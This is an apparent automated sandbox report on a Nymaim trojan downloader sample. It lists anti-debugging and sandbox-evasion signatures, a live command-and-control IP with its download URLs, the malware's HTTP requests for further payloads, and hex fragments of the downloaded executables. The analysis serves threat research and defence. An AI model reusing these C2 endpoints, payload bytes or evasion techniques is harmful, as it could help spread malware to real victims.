Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1565422
MD5:	f7de1701682b8875c140e8d55b51b2d6
SHA1:	42afc2d0566630d75efbada19b24fa42464c72c2
SHA256:	60deca977327bb594df9bcbbb81215761b4f84ce48c0e3243531e86e9831dca0
Tags:	exeuser-Bitsight
Infos:

Detection

Nymaim

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected Nymaim

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

×

Process Tree

System is w10x64

file.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F7DE1701682B8875C140E8D55B51B2D6)

WerFault.exe (PID: 5732 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 644 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nymaim	Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.	No Attribution	https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/ https://bitbucket.org/daniel_plohmann/idapatchwork https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/goznym/ https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim	https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1259267690.0000000004A50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.4a20e67.1.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.2.file.exe.400000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.3.file.exe.4a50000.0.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.2.file.exe.400000.0.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.file.exe.4a20e67.1.raw.unpack

Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe	ReversingLabs: Detection: 75%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,		0_2_004035D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A23837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,		0_2_04A23837

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00417727 FindFirstFileExW,		0_2_00417727
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_10007EA9 FindFirstFileExW,		0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A3798E FindFirstFileExW,		0_2_04A3798E

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 185.156.72.65
Source: Malware configuration extractor	IPs: 185.156.72.65
Source: Malware configuration extractor	IPs: 185.156.72.65
Source: Malware configuration extractor	IPs: 185.156.72.65

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Nov 2024 18:50:34 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Nov 2024 18:50:36 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00

Source: Joe Sandbox View

IP Address: 185.156.72.65 185.156.72.65

Source: Joe Sandbox View

ASN Name: ITDELUXE-ASRU ITDELUXE-ASRU

Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.72.65

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,

Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1947623162.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/dll/downloadG
Source: file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/dll/downloadQ
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/dll/key
Source: file.exe, 00000000.00000003.1585127269.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/files/download
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/files/download65/files/download-e433ee860fe502924bLMEM
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/files/downloadN
Source: file.exe, 00000000.00000002.1949998784.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/soft/download
Source: Amcache.hve.13.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
